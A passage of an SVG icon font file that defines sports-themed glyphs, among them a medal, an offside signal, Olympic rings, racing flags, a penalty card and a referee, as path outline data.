41h12l-35-49-5 8 28 41z m41-105c-10 0-21 1-31 3l-7 11c12-3 25-5 38-5 14 0 27 2 40 6l-7-12c-11-2-22-3-33-3z m78-17c-3 2-7 4-11 6-12 6-25 12-27 14 0 0 0 1 1 2 2 3 5 7 8 12 10 16 25 40 26 41 1 1 31 9 49 14 7 1 12 3 14 3 1-3 4-18 6-31 1-4 2-8 2-12-18-20-42-37-68-49z m65 100l-13-3c14 21 23 47 25 75l8-11c-3-22-10-42-20-61z m-19 122c1 6 2 30 4 48 0 6 0 11 1 14 0 1 0 1 0 2 3-1 18-3 31-5 4-1 8-2 12-2 13-24 22-51 24-80-2-3-5-6-8-9-10-9-20-19-23-21-3 3-6 7-10 12-8 10-19 24-26 32-3 4-5 7-5 9z m-57-29l3 11 48 14 6-7-57-18z m56 98l-1-14c-17 22-40 39-67 49l13 5c21-9 39-23 55-40z m-169 72c2 5 4 8 5 11 13 3 27 5 41 5 14 0 28-2 41-5 2-3 4-6 6-11 6-11 14-24 15-27 0 0-1-1-3-1-3-1-8-3-13-5-14-6-32-13-40-16-3-1-5-2-5-2 0 0-2 1-5 2-8 3-27 11-41 16-6 2-10 4-13 5-1 1-2 1-3 1 2 3 9 16 15 27z m-21-31l13-5c-26-10-49-27-66-48l-1 13c15 17 34 30 54 40z m-49-113l48-15 3-11-56 18 5 8z m-44 61c14 3 30 5 33 6 0-2 1-7 1-14 1-17 3-44 4-50 0-2-2-5-5-8-7-9-20-24-28-35-4-5-7-9-8-10-4 3-15 14-24 23-4 3-7 6-9 8 3 29 11 55 24 78 4 1 8 1 12 2z m239-384c-30-21-61-44-97-58-36-15-75-25-114-32-39-8-80-11-120-12l-1-5c41-7 82-9 123-8 42 2 84 8 125 19 40 12 83 26 116 58 32 31 54 73 56 117l-5 1c-27-32-53-59-83-80z" />
<glyph glyph-name="leg" horiz-adv-x="1000" unicode="&#xedb2;" d="M479 521c-4-13 63-46 75-138 9-54-37-141-16-279 21-133 62-154 62-200 0-25-16-54-58-54s-79 12-96 12c-41 0-37-12-154-12-17 0-29 0-37 8-13-4-21-8-34-8-21 0-37 12-37 33 0 9-4 13 37 17 17 4 46 12 88 29 42 17 75 12 100 54 21 42-8 142-42 230-12 37-37 78-46 120-12 46-4 96-29 134-33 54-33 100 9 141 16 84 87 200 133 242v-4h383c-46-129-234-242-275-263-33-16-58-45-63-62z" />
<glyph glyph-name="match-review" horiz-adv-x="1000" unicode="&#xedb3;" d="M980 569c-26 86-81 147-162 190 46 17 46 17 34 62-1 5-3 10-4 15-2 15-11 16-23 13-62-16-124-31-186-46-15-4-20-11-16-26 18-61 35-123 51-184 3-9 4-19 16-16 21 5 45 7 62 18 14 11-5 30-5 46 0 2 1 4 1 6 2 0 4 1 6 1 122-48 151-210 51-296-16-13-16-22-5-37 16-20 30-41 43-64 10-17 18-17 33-5 96 72 139 205 104 323z m-464-530c-51 0-95-43-95-94 0-51 42-94 93-95 50 0 95 44 95 93 1 50-43 95-93 96z m-43 127c0 50-41 92-92 93-53 1-95-38-96-90-1-52 40-94 92-95 52 0 95 41 96 92z m185 93c-54 2-95-37-96-90-2-52 36-93 87-95 55-1 97 37 98 89 2 54-37 95-89 96z m-556 1c-52 0-94-42-93-94 0-51 41-91 92-92 53 0 94 40 95 92 0 53-41 94-94 94z m619 181c9 7 25 17 21 26-8 15-22 28-36 38-12 7-19-8-25-16-19-24-35-25-53 1-14 21-27 18-43 0-14-16-29-28-2-45 26-17 25-35 0-53-4-3-7-8-11-11-10-7-8-14 1-21 6-6 13-12 19-19 10-12 19-14 30 0 4 5 10 9 14 15 12 16 24 17 36-1 4-4 8-8 13-12 6-5 10-18 21-11 14 11 27 24 45 40-13 11-21 18-30 24-20 15-21 29 0 45z m-399 172c11 14 35 22 8 45-30 27-29 30-1 56 16 15 19 25 1 39-14 11-23 34-46 8-26-31-27-29-58 0-6 6-10 19-23 11-33-17-39-41-12-64 20-18 17-29-1-44-9-7-19-14-24-29 12-11 24-25 38-35 13-8 18 9 25 15 27 26 28 27 55-2 14-16 25-19 38 0z m-300-160c7-5 11-12 17-16 17-13 18-24 1-37-5-3-8-9-13-12-20-13-12-25 2-36 13-9 22-36 43-9 8 11 16 22 24 33l13 1c6-10 12-21 20-29 6-7 14-22 22-17 14 9 28 22 38 37 7 11-9 18-16 24-24 19-26 35 0 53 3 2 4 4 6 6 23 17 4 27-6 36-11 9-17 32-39 9-30-32-32-31-64 0-29 27-32-10-47-18-12-6-12-16-1-25z m307 52c-15-9-29-22-37-37-6-11 11-20 20-26 22-17 19-32-1-47-6-4-10-10-15-15-6-5-6-10-1-17 24-35 37-38 65-7 16 17 25 15 39-1 7-10 15-20 30-26 12 12 26 23 36 38 8 12-8 17-15 24-26 28-26 27 1 55 6 6 19 14 16 20-10 15-22 28-36 38-12 9-18-7-25-14-27-26-27-26-55 1-7 6-13 21-22 14z" />
<glyph glyph-name="medal-sport" horiz-adv-x="1000" unicode="&#xedb4;" d="M606 383h6v139h-4l221 221-107 107-222-222-221 222-107-107 221-220h-5v-140h7c-100-42-171-141-171-256 0-153 124-277 276-277 153 0 277 124 277 277 0 115-71 214-171 256z m116 435l75-75-206-205-75 74 206 206z m-269-355h95l29 29h5v-79h-163v79h4l30-29z m47-564c-125 0-228 102-228 228s103 228 228 228 228-103 228-228c0-126-102-228-228-228z m0 431c-112 0-202-91-202-203 0-112 90-203 202-203 112 0 203 91 203 203 0 112-91 203-203 203z m28-352h-43v255l-42-42v42l42 43h43v-298z" />
<glyph glyph-name="offside" horiz-adv-x="1000" unicode="&#xedb5;" d="M580 622c-133-10-264 20-397 18-43 0-84-8-97-56-27-93-51-187-76-281-6-23-4-47 23-53 24-5 31 20 37 36 13 40 23 81 35 121 16-162 16-321 16-481 0-34-4-77 46-76 51 0 43 44 43 78 1 100 0 199 0 299l38 0c0-98-2-196 1-294 0-31-17-80 36-82 62-2 41 53 42 85 2 185 3 370 0 555-1 57 18 79 76 75 56-3 114 0 171 0 22 0 48 2 49 31 0 24-25 27-43 25z m-354 55c58-1 91 35 92 86 0 51-30 88-108 87-36-3-72-27-72-85 1-56 32-87 88-88z m759-67h-333c-4 0-8-4-8-8v-3c0-5 4-8 8-8h333c5 0 9 3 9 8v3c0 4-4 8-9 8z m-12-32h-104c-11 0-20-9-20-20v-68c0-11 9-20 20-20h104c12 0 21 9 21 20v68c0 11-9 20-21 20z" />
<glyph glyph-name="olympic-logo" horiz-adv-x="1000" unicode="&#xedb6;" d="M850 576c8-1 16-1 24-3 49-11 86-38 109-83 40-79 7-173-73-211-89-42-196 10-217 106-1 3-2 6-2 9 0 1 0 2 2 2 10-3 20-6 30-10 1-1 2-2 2-4 13-39 39-65 77-79 69-26 147 16 164 87 14 60-16 120-72 144-73 32-154-11-172-86 0-3-1-6-1-8 0-4-2-3-4-2-7 2-14 3-22 4-5 1-5 1-4 6 7 34 23 64 49 87 25 23 55 36 89 40 3 0 5 0 8 1h13z m-692 0c8-1 15-1 23-2 36-6 67-23 91-51 28-32 42-69 39-111-4-64-37-109-95-136-4-1-5 0-4 3 0 9 1 19 3 28 1 2 1 4 3 5 34 20 55 49 61 87 12 69-35 133-101 144-66 11-126-28-143-92-16-63 19-128 80-149 16-5 31-7 47-7 3 1 4 0 4-3-1-8-1-16 0-23 0-4-1-5-4-5-15 0-31 1-45 5-51 15-87 47-107 96-24 62-3 136 49 177 25 19 52 30 82 33 4 0 9 0 13 1h4z m344 0c7-1 15-1 23-2 62-10 113-58 127-118 16-72-18-144-84-176-3-2-6-3-9-4-2-1-3-1-3 2 0 10 1 20 3 30 1 2 2 3 4 4 34 20 54 50 61 89 10 62-29 122-90 139-72 20-143-25-157-97-1-6-1-6-7-5-7 2-14 3-21 4-3 0-3 1-3 3 4 25 14 47 29 67 26 35 60 56 103 62 7 1 13 1 20 2h4z m165-452c-8 1-16 1-23 3-65 15-106 54-123 118-18 73 23 151 93 179 1 0 2 0 3 1 1-8-1-15-1-22-1-9-5-15-12-20-32-20-50-50-55-87-9-65 36-126 100-139 69-13 136 33 147 103 1 3 1 3 4 2 8-2 16-3 24-4 2-1 3-1 3-4-10-49-36-87-81-111-19-11-40-17-62-18-1-1-3-1-4-1h-13z m-344 0c-8 1-16 1-23 3-62 14-103 51-121 111-22 75 18 156 90 185 1 1 2 2 4 1 0-11-1-22-4-33 0-2-2-2-3-3-31-19-51-46-59-82-13-58 19-119 74-142 73-29 152 12 170 89 0 1 0 2 1 4 1 6 1 6 7 4 6-1 13-3 20-3 3-1 4-2 3-5-3-19-10-37-20-54-26-41-63-65-111-73-5-1-10-1-14-2h-14z m173 141c-65 4-113 35-140 96-4 10-7 20-9 31-1 3 0 3 3 3 9-2 17-5 26-8 3-1 4-2 5-5 12-35 35-61 68-76 18-8 37-12 57-11 3 1 4 0 4-4-2-7-1-15 0-23 0-2 0-3-3-3-4 0-7 0-11 0z m167 170c29 2 55-3 80-16 45-24 72-60 83-109 1-6 1-6-5-5-8 2-17 5-25 8-2 1-3 2-4 4-15 44-45 73-90 84-12 3-24 4-35 3-3 0-4 0-4 4 2 9 2 18 0 27z m-330 0c70-1 130-50 147-116 1-4 1-8 2-12 1-2 0-3-2-2-10 2-20 5-29 8-2 1-3 3-3 4-12 37-36 63-72 78-17 7-34 10-52 9-5 0-5 0-5 5 1 7 2 15 0 22 0 3 0 4 4 4 3 0 6 0 10 0z" />
<glyph glyph-name="olympic" horiz-adv-x="1000" unicode="&#xedb7;" d="M331 254c10-8 21-11 33-11 17 0 32 4 47 11 37 18 65 46 87 80 4 7 7 14 11 21 29 49 39 101 26 156-8 37-27 70-51 99-4 5-9 11-14 16 0-2 0-3 0-5 9-32 9-64-2-96-12-35-36-61-67-80-25-15-48-33-68-54-14-14-26-29-34-47-8-20-8-39 2-58 8-13 18-23 30-32z m-36-49c4-8 7-16 11-24 23-43 56-75 101-95 3-1 6-2 10-2 54 0 108 0 162 0 2 0 4 0 5 1 52 20 90 54 112 105 2 6 4 11 6 17-136 0-271 0-407-2z m184 456c22-25 41-53 55-83 19-39 30-79 32-122 2-47-8-92-29-134-2-5-4-9-7-15 2 1 4 2 5 3 9 5 18 10 26 17 25 22 40 50 48 81 12 40 10 80 6 121-2 22-9 43-19 63-13 29-31 55-51 79-14 17-25 36-30 58-6 27-5 55-3 83 2 13 3 25 5 38-1 0-2-1-2-1-21-13-39-29-53-50-15-22-21-47-16-74 5-25 17-45 33-64z m225-180c-2-1-3-2-4-3-29-30-56-63-79-98-17-27-32-55-40-86-2-10-4-21-1-31 3-10 10-14 20-11 2 1 3 1 5 2 40 20 68 51 85 92 11 25 16 52 17 80 0 18-1 36-3 55z m-209-631c18 55 34 109 51 165h-100c17-56 33-110 49-165z m77 220c-18 0-35 0-52 0h-96c-8 0-15-3-19-11-7-13 3-28 18-28 25-1 50 0 74 0 25 0 49-1 73 0 4 0 9 1 13 3 7 5 10 14 8 22-3 9-10 14-19 14z m-184 399c13-4 25 0 30 11 2 6 3 12 2 18-4 17-14 30-26 42-10-13-19-26-22-42-3-14 3-24 16-29z" />
<glyph glyph-name="padding" horiz-adv-x="1000" unicode="&#xedb8;" d="M625 392c0-46-37-84-83-84-46 0-84 38-84 84s38 83 84 83c46 0 83-37 83-83z m121-459c-213 0-325 167-504 167-171 0-242-167-242-167s50 84 238 84c175 0 266-167 500-167 175 0 262 167 262 167s-104-84-254-84z m-67 67c-154 50-283 183-471 183 0 0 17 92 117 171 8 4 50 171 50 171 4 13 12 23 23 29l135 68c-15 8-29 21-41 36-34 46-71 125-71 125l137 67s42-62 55-121c9-35 14-77 1-100l1-3c2-2 4-4 6-7 2-5 3-10 3-15l134-296c10-2 20-8 27-18 9-14 9-31 1-45l26-59c9-3 19-8 30-15 25-21 75-88 87-138-21-33-92-58-125-58-61 116-47 175-33 201l-19 42-104-69c-7-5-15-7-23-7-6 0-13 1-19 4l-119 60c-9-14-20-36-20-52 121-62 141-108 212-154z m39 295l-120 266-144-72-7-32-14-119 191-105 94 62z" />
<glyph glyph-name="penalty-card" horiz-adv-x="1000" unicode="&#xedb9;" d="M502 648c5 16 8 33 13 49 11 34 39 50 73 41 123-33 246-66 368-100 35-10 51-37 41-72-35-133-71-265-107-398-14-50-27-100-40-150-14-53-37-68-89-54-80 21-160 43-240 65-14 4-27 4-41-1-65-23-130-46-195-68-50-18-77-5-94 45-61 177-123 354-185 531-15 43-3 68 40 84 119 42 237 83 355 124 32 11 61-3 74-34 8-20 15-41 22-61l5-1z m91-585c64-18 125-35 186-52 17-5 18 8 21 19 48 176 96 353 145 529 5 21 1 30-21 35-95 25-191 52-286 78-22 6-49 21-67 14-20-8-14-42-23-64-4-12-5-24-10-36-8-22-5-43 3-65 43-122 85-244 127-366 11-33-2-59-34-73-13-5-27-7-41-19z" />
<glyph glyph-name="racer" horiz-adv-x="1000" unicode="&#xedba;" d="M604 255c45 27 76 66 95 115 26 63 39 128 40 195 1 26-1 51-7 75-18 75-56 132-131 160-40 15-82 17-124 15-132-7-197-95-210-203-8-74 4-145 27-215 19-57 48-108 102-140 25-15 50-30 77-43 19-9 38-10 58 0 25 13 49 27 73 41z m-81 126c-6-32-12-64-18-95 0-3-1-5-2-8l-3 0c-6 35-13 69-19 103-2 11-6 15-17 17-57 8-107 35-156 65-5 4-6 8-7 14-7 35-10 71-9 107 1 22 1 22 23 24 52 3 104 4 155 4 72 0 143 0 214-4 26-2 26-1 27-28 1-34-2-68-8-102-2-8-5-14-13-18-48-29-98-56-155-63-10-2-11-9-12-16z m443-248c-24 24-53 37-85 46-47 13-96 24-144 37-16 4-33 8-45 19-18 17-24 18-44 4-33-23-68-45-106-61-11-4-15-10-15-22 0-42 0-85 0-128 0-43 0-85 0-128-1-11 2-15 14-15 76-1 151 2 226 13 60 10 120 21 174 53 68 39 79 125 25 182z m-125-101c0-10-3-12-13-12-31 0-62 0-94 0-30 0-60 1-91 0-12 0-15 4-15 15 1 20 1 40 0 60 0 9 4 12 13 12 62 0 125 0 187 0 10 0 14-3 14-14-1-20-2-40-1-61z m-368-4c0 43 0 86 0 128 0 12-4 18-15 22-38 16-73 38-106 61-20 14-25 13-43-4-13-11-30-15-46-19-48-13-96-24-144-37-32-9-61-22-85-46-54-57-43-143 25-182 54-32 114-43 175-53 74-11 150-14 225-13 12 0 15 4 15 15-1 43-1 85-1 128z m-116-8c-30 1-61 0-91 0-31 0-63 0-94 0-10 0-13 2-13 12 1 21 0 41-1 61 0 11 4 14 14 14 62 0 125 0 187 0 9 0 13-3 13-12-1-20-1-40 0-60 0-11-3-15-15-15z m211 427c9 4 19 8 29 11 8 2 10 7 10 15 0 19 0 38 0 56 0 42 0 42-41 41-11 0-13-4-12-13 0-17 0-33 0-50 0-16 0-32 0-49-1-11 1-17 14-11z m-164 123c-13 0-16-4-15-16 1-25 1-51 0-76 0-10 3-15 12-18 8-2 14-7 24-8 0 33 0 66 0 98 0 20 0 19-21 20z m231-92c11 6 26 6 27 20 1 20 0 41 0 61 0 12-10 7-16 8-6 2-11 0-11-8 1-27 0-53 0-81z m-282 89c-7 0-14 2-14-9 1-15 2-31 1-45-2-18 6-27 24-32 0 26 0 52 1 77 0 10-6 10-12 9z" />
<glyph glyph-name="racing-car" horiz-adv-x="1000" unicode="&#xedbb;" d="M939 237c34 51 69 100 59 167-2 18-8 25-23 33-51 28-105 29-162 28-26 0-50-3-68-24-18-19-32-21-43 6-17 46-50 60-98 55-25-3-40-7-35-35 8-50-34-58-64-72-27-12-57-13-79 15-6 9-14 14-26 14-41-1-82 0-127 0 79-52 91-80 76-173-4-20 1-29 24-29 99 1 197 0 296 0 34 1 40 9 30 42-14 52 3 105 46 137 43 32 90 35 137 11 48-24 72-74 67-128-1-16-9-31-10-47z m-354 49c-61 1-122 1-184 0-32 0-20 25-21 41-1 15-8 37 22 35 31-1 63 0 94 0 30 0 60-1 90 0 32 2 24-21 24-38 0-17 6-39-25-38z m240 115c-55 2-101-41-103-97-3-57 39-103 96-106 55-3 104 42 106 98 2 55-43 103-99 105z m-2-174c-40-1-73 32-73 72-1 40 32 73 72 73 40 0 73-33 73-72 1-40-32-73-72-73z m-591 174c-55 1-100-42-103-97-2-58 41-104 97-106 55-2 104 43 105 99 2 55-43 102-99 104z m-1-174c-41-1-73 31-74 71 0 41 31 73 72 74 39 1 73-32 74-72 1-39-32-73-72-73z m-97 159c-44-18-69-44-96-67-19-15-43-68-37-88 1-3 4-7 5-7 30-1 60-7 89 4 10 3 19 13 14 28-15 44-6 85 25 130z m388-31c-24 1-21-16-20-31-2-14-4-29 17-30 18 0 22 11 20 28-2 13 6 31-17 33z m299-38c-11-1-16-9-15-19 1-10 7-18 18-16 10 1 16 8 16 19-2 10-9 17-19 16z m-593 0c-10-1-16-8-15-19 1-10 7-18 18-16 10 1 16 8 17 19-3 10-9 17-20 16z" />
<glyph glyph-name="racing-flag-alt" horiz-adv-x="1000" unicode="&#xedbc;" d="M963 850l-64-55s-93-76-186-76c-42 0-76 17-118 34-47 21-102 50-182 50-229 1-360-139-368-148l-13-12 220-618c0 0 62-175 62-175l80 28-75 212c35 29 109 83 183 83 63 0 101-13 135-21 34-9 68-21 119-21 101 0 186 46 190 46l21 13-4 660z m-212-639c-18 0-33 2-48 5l-32 139c-43 13-106 34-135 34l38-141c-23 3-49 5-81 5-27 0-53-5-78-13l-53 136c-42-17-87-50-117-75l-68 193c62 47 122 68 122 68l-53 132c46 19 103 33 171 33 11 0 22-1 32-2l36-137c38 0 144-51 144-51l-31 133c35-15 71-27 120-27 19 0 38 3 57 7l10-134s45 12 102 48v-179c-47-21-89-30-89-30l10-138c-18-3-37-6-57-6z m-300 377h34l51-195s-38 4-77 4c-38 0-93-21-93-21l-72 182c0 0 72 30 157 30z m275-81c34 0 59 9 59 9l13-161s-34-4-63-4l-68 8-38 174c0 0 50-26 97-26z" />
<glyph glyph-name="racing-flag" horiz-adv-x="1000" unicode="&#xedbd;" d="M999 534c-17 41-51 84-107 90-34 4-67-1-100-2-56-3-99 17-128 66-2 3-4 6-6 9-8 11-20 11-27-1-3-4-4-9-6-13-31-102-62-203-93-305-10-33-20-66-30-98l-4 0c-1 5-3 10-5 15-39 129-79 258-119 388-3 9-5 20-17 22-12 2-16-9-21-17-20-32-46-55-84-63-33-6-66-3-99 0-71 7-120-21-149-84-4-7-4-13-4-21 8-91 16-181 24-272 2-25 5-49 8-76 4 6 6 9 8 12 21 28 47 47 83 52 30 4 59-4 87-12 43-12 84-30 128-38 52-8 96 6 128 49 2 3 4 7 8 8 15-20 4-40-2-59-16-54-33-107-49-160-4-15 1-26 12-29 13-3 16 8 19 18 9 32 19 65 29 98 5 16 10 32 15 47 5-1 5-4 6-6 14-48 29-95 43-143 3-8 6-16 17-14 10 2 14 10 14 20 0 4-1 8-2 12-19 60-37 121-56 181-5 14 0 24 6 37 5-7 9-12 14-17 26-31 59-46 100-44 21 1 41 6 61 12 41 12 82 29 125 37 53 11 97-2 131-46 3-4 5-10 12-12 10 118 21 234 31 350 0 3 0 6-1 9z m-857-159c-28 1-24 5-20-22 3-26 7-51 10-77 1-6 3-13-7-13-32 0-54-17-73-39-1-2-2-4-6-3-3 33-6 66-9 100 0 4 3 7 6 10 17 23 35 42 66 45 7 1 8 5 7 11-5 29-9 59-13 89-1 12-7 13-16 10-20-7-34-22-46-38-4-5-7-10-14-19-3 39-11 73-6 106 5 29 27 53 57 65 10 4 9-3 9-8 5-30 10-60 13-90 2-10 5-12 15-11 23 2 45-2 68-6 16-3 16-3 13 14-6 32-12 63-18 95-3 10 0 12 9 11 24-4 48-4 71 1 8 1 11-3 12-9 9-41 18-82 27-123-4-3-10-2-16-3-22-1-44 3-66 7-13 3-15 0-12-12 7-36 13-71 20-107-27 4-53 15-81 16z m282-17c-14-12-31-18-49-18-15 0-30 0-46 0 9-40 18-78 27-116 4-19 3-19-15-16-29 4-57 13-85 23-5 2-10 3-12 11-6 39-14 78-21 117 29-8 58-17 89-19 12 0 16 2 13 16-10 39-18 79-27 118 36 5 62 27 85 59 6-22 12-42 18-61 10-31 19-63 29-94 3-9 0-14-6-20z m538-41c-3-32-5-64-8-96-6-1-8 4-10 7-18 20-38 35-67 35-12 0-11 8-10 16 5 27 8 55 13 83 2 12-2 15-14 14-24-2-48-7-72-13-5-1-10-5-16-3-7-38-15-76-22-114-1-8-5-12-13-15-27-10-55-19-85-23-17-3-18-3-14 14 8 34 15 69 24 103 3 11 1 16-12 15-11-1-23 0-34 0-11 0-23 3-33 9-20 11-23 17-17 39 15 48 29 95 45 144 6-8 11-14 17-20 14-17 32-27 52-35 12-4 17-1 19 11 8 36 17 72 25 108 1 8 3 11 13 9 23-4 46-4 69 0 9 1 13-1 10-11-6-31-12-63-18-95-3-17-3-17 13-14 27 5 54 9 81 5-4-33-8-66-14-98-1-11 1-15 12-17 30-4 47-25 64-48 2-3 2-6 2-10z m18 198c-2-27-5-53-9-81-19 26-39 49-72 56 2 35 9 70 13 104 1 7 4 8 11 6 30-11 59-54 57-85z m-202-144c6 32 12 65 19 97 2 10 2 13-10 11-24-6-50-10-75-7-8 0-11-3-12-11-8-36-17-73-25-110-3-9 0-11 8-10 33 1 64 9 95 19 0 4 0 7 0 11z" />
<glyph glyph-name="racings-wheel" horiz-adv-x="1000" unicode="&#xedbe;" d="M803 247c32-3 63-14 92-28 36-18 66-46 105-78-42 114-127 158-234 185 127 42 191 91 208 155-86-65-192-84-265-48 146 76 209 147 215 247-10-11-18-21-26-30-97-109-216-139-354-99-66 19-133 32-206-6 81-33 138-83 173-157 35-75 36-152 6-237 135 58 252-18 375-18-41 20-80 39-111 71-9 10-27 20-21 34 8 17 28 10 43 9z m-559 263c-135 0-242-107-244-242-2-136 107-247 243-248 136-1 245 107 245 245 1 137-108 245-244 245z m-2-438c-105 1-190 88-190 193 0 105 86 193 190 194 106 1 195-88 195-194 0-106-90-195-195-193z m113 311c-11-1-71-83-70-98 0-12 77-46 104-46 24 0 21 17 22 33 0 45-33 111-56 111z m-65-13c31 46 27 55-28 62-6 0-11 1-19 1-24-3-57 1-71-24-13-23 15-39 28-56 50-64 40-58 90 17z m-92-79c-6 18-67 86-75 81-35-21-40-58-45-95 0-1 0-3 0-6 2-13-6-39 22-33 32 6 62 19 92 31 9 3 9 12 6 22z m148-80c-13 4-27 7-40 13-33 15-44 2-41-30 1-9 0-17 0-28 6-18-12-49 13-59 25-10 47 12 68 26 5 3 9 7 13 10 39 36 36 52-13 68z m-121-49c-1 75-1 75-67 52-6-2-11-4-16-6-46-16-49-29-15-62 7-7 14-14 23-19 20-12 43-32 65-20 21 11 6 39 10 55z m22 127c-16 2-27-7-27-24-1-14 8-23 23-24 15-1 24 7 25 22 1 14-5 25-21 26z" />
<glyph glyph-name="referee" horiz-adv-x="1000" unicode="&#xedbf;" d="M850-29c-4 66-9 131-15 196-2 32-9 64-39 85-37 26-79 33-121 41-9 2-9-5-9-11 0-14 0-28 0-42-1-24-9-28-29-16-4 3-9 6-13 9-17 13-28 9-33-11-1-6 0-13 0-19 0-102-1-204 0-306 0-32-22-18-36-22-19-4-16 10-16 22v283c-41-12-41-12-80 2v-26c0-87 0-175 0-262 0-12 0-23-16-19-13 4-36-9-35 20 0 21 0 42 0 63 0 84-1 169 0 253 0 12-1 25-12 30-10 6-17-7-25-12-4-2-7-5-10-7-16-10-27-4-28 14-1 14-1 28 0 42 1 12 0 18-15 14-18-5-37-6-55-12-51-15-92-41-99-101-8-69-11-138-14-207-1-41 10-56 46-72 50-22 103-32 156-39 96-15 193-15 290-1 56 8 111 19 163 41 35 15 47 32 45 70z m-654-42c-15 4-23 13-22 27 0 77 6 152 15 228 0 4 1 10 7 12l0-267z m132 149c0-57 0-114 0-171 0-15-2-18-19-16-28 3-33 14-33 40 1 103 0 205 0 308 0 17 32 36 47 28 8-4 5-12 5-19 0-56 0-113 0-170z m395-159c0-16-35-37-48-29-6 4-4 12-4 18 0 57 0 115 0 172 1 56 2 113 1 169 0 16 4 20 21 18 23-3 31-12 31-37-2-104-1-207-1-311z m80 8c0 47 1 91 0 136-2 44 0 89 3 134 14-55 18-112 19-168 0-22 0-44 1-66 1-15-3-27-23-36z m-185 405c-12 6-17 9-19-7-7-54-39-90-85-116-10-6-18-5-28 1-44 27-80 62-87 117-2 14-6 12-16 6-42-24-41-62-37-104 15 4 24 14 34 22 12 8 18 10 28-4 18-25 43-44 70-60 15-8 28-9 43 0 29 16 54 34 73 61 9 13 15 10 25 3 11-8 20-18 35-21 4 41 6 79-36 102z m-298 183c1-14 8-26 13-39 4-8 10-14 19-16 3-1 3-4 4-6 3-17 8-33 16-48 13-22 31-39 51-53 13-9 25-18 40-24 29-12 58-11 86 4 25 14 49 30 68 53 14 18 26 38 27 62l1 6c0 3 2 5 5 7 11 4 16 12 20 22 3 11 9 22 11 33v15c-1 4-2 9-4 14-2 7-7 13-14 17-3 1-3 3-3 6 0 13 2 26 4 39 4 35-2 68-16 101-4 8-9 15-10 24 0 3-2 4-4 4-7 1-10 5-12 11-1 1-2 3 0 4 4 4 1 4-2 5-5 1-10 1-15 0-3 0-4 1-4 3-1 5-3 10-5 15-1 2-2 3-5 2-9-2-19-1-28 3-4 2-8 6-9 11-4 9-9 17-21 18-3 0-2 2-2 4 0 6 0 11 0 18-6-3-9-6-14-8-7-2-9-1-9 6 0 8 2 15 6 22h-4c-9-3-16-6-21-14-1-2-2-5-4-8-4 8 1 13 4 20-13-4-23-12-32-22-5-6-9-13-14-20-3-4-4-4-6 1-1 1-1 2-2 3 0 2 1 3-1 4-4-2-6-5-8-9-3-7-6-14-10-21-4-9-7-9-14-4-1 0-2 1-3 2-5 5-5 5-11-1-9-11-16-23-23-36-3-7-9-14-15-20-5-4-9-9-14-14 2-2 5-1 7-1 5-1 6-3 4-8-4-9-9-18-14-27l-2-5c2-1 3 1 5 1 2 0 3 2 5 0 1-1-1-3-1-4-4-12-9-24-13-36 1-1 2 0 3 0 6 2 6 2 6-4-1-21-2-41 0-62 0-2 0-3-2-4-15-12-17-28-14-46z m18 30c3-8 4-15 5-23 1-4 9-9 14-7 2 1 1 2 1 3-1 6-1 12-1 18-3 28 2 55 8 82 5 19 8 38 14 57 2 5 5 11 7 17 6 13 17 19 32 20 13 0 27-1 40-5 18-5 35-3 52 2 14 4 28 6 42 6 16 0 28-7 37-19 11-14 16-30 22-45 5-13 9-25 16-37 1-2 2-3 3-5 10-9 10-22 11-35 1-16 1-32 0-48 0-3-1-6 4-6 4 0 8-1 8 5 1 8 2 16 3 24 5-2 7-6 8-10 4-11 4-22-1-32-2-7-5-14-8-21-1-4-4-8-8-11-2-1-4-3-6-2-7 2-7-2-8-7-1-8-2-16-4-24-2-16-10-29-19-41-21-27-48-48-79-60-25-11-51-9-75 7-16 11-32 21-46 34-23 21-36 47-41 77 0 2-1 4-1 6-1 5-2 10-9 8-6-1-10 4-12 9-5 12-11 23-14 36-1 9 0 18 5 27z m170-116c-6-2-12-2-18 0-4 1-8 2-12 2-11-1-21-4-32-4 8-6 16-9 26-8 5 0 9 0 13-1 10-4 19-4 28-1 5 2 10 2 15 0 8-1 15-1 23 1 1 0 2 1 3 2 0 1-1 1-2 1-9-2-15 3-23 7-7 3-14 4-21 1z m26 114c3-2 4 1 5 3 3 5 8 8 15 10-4-10-3-15 3-19 5-4 10-4 15 0 6 4 6 10 3 19 7-3 12-6 15-13 1-2 2-4 4-3 3 1 2 4 1 6-1 4-3 7-6 9-12 9-31 11-45 4-4-3-8-6-10-10-1-2-3-5 0-6z m-76 14c-10 6-20 7-31 5-10-2-19-6-23-17-1-2-1-4 1-5 3-1 4 1 4 2 3 8 9 11 17 14-4-9-3-14 2-19 4-3 10-4 14-2 8 5 9 12 6 20 6-2 11-5 14-10 0-2 2-4 4-2 2 1 2 3 1 5-2 4-5 7-9 9z m-55 21c5 2 10 3 15 4 11 1 22-2 32-6 7-3 13-2 15 2 1 4-1 7-9 10-12 5-23 7-36 6-9-1-18-5-26-12-4-4-6-8-4-16 3 7 8 10 13 12z m136-4c3 0 5 0 7 1 3 1 6 3 10 4 19 7 41 2 52-12 2 7 0 11-5 15-8 8-18 12-30 12-12 0-25-2-36-8-3-2-5-4-4-7 1-3 4-4 6-5z m-62-102c9-6 18-7 28-3 9 5 14 12 15 23 0 2-1 5-2 7 0 3-2 6-5 5-4-1-3-4-2-7 2-7 0-12-5-17-7-7-17-7-25 0-2 2-4 3-6 1-2-3-1-5 0-6 1-1 2-2 2-3z m-4-71c11-15 37-16 48-2-16-2-32-3-48 2z" />
<glyph glyph-name="refree-jersey" horiz-adv-x="1000" unicode="&#xedc0;" d="M987 520c-73 61-145 123-217 185-4 3-9 8-14 9-42 6-84 13-131 20 14-23 10-44 10-64 0-20-9-26-27-15-5 3-9 5-18 10 0-16 0-28 0-39 0-205-1-409 0-613 1-35-22-23-39-26-23-4-21 10-21 25 0 167 0 333 0 500 0 33 0 65 0 101-20-10-38-13-58 1 0-13 0-23 0-32 0-191 0-382 0-573 0-16-2-27-21-22-15 3-37-10-37 22 1 144 0 288 0 432 0 74 0 148 0 221-10 4-13-2-17-5-22-12-30-8-32 17-2 17 10 41-2 48-12 8-34-1-52-3-18-1-36-4-54-5-9-1-18-5-25-11-74-62-148-125-222-187-12-10-13-17-3-29 43-49 85-99 126-149 11-14 18-12 29-2 21 19 44 37 72 61 0-18 0-27 0-36 0-113 0-226 0-339-1-24 8-38 30-44 10-3 20-7 30-9 104-22 209-21 314-14 40 2 79 7 117 19 38 12 42 15 42 54 0 111-1 223 0 334 0 9-5 20 5 30 21-17 43-34 63-52 15-14 23-16 37 2 38 48 78 95 118 140 15 17 12 25-3 38z m-766-104c-19-16-38-31-57-47-5-4-10-8-16 0-5 6 1 10 5 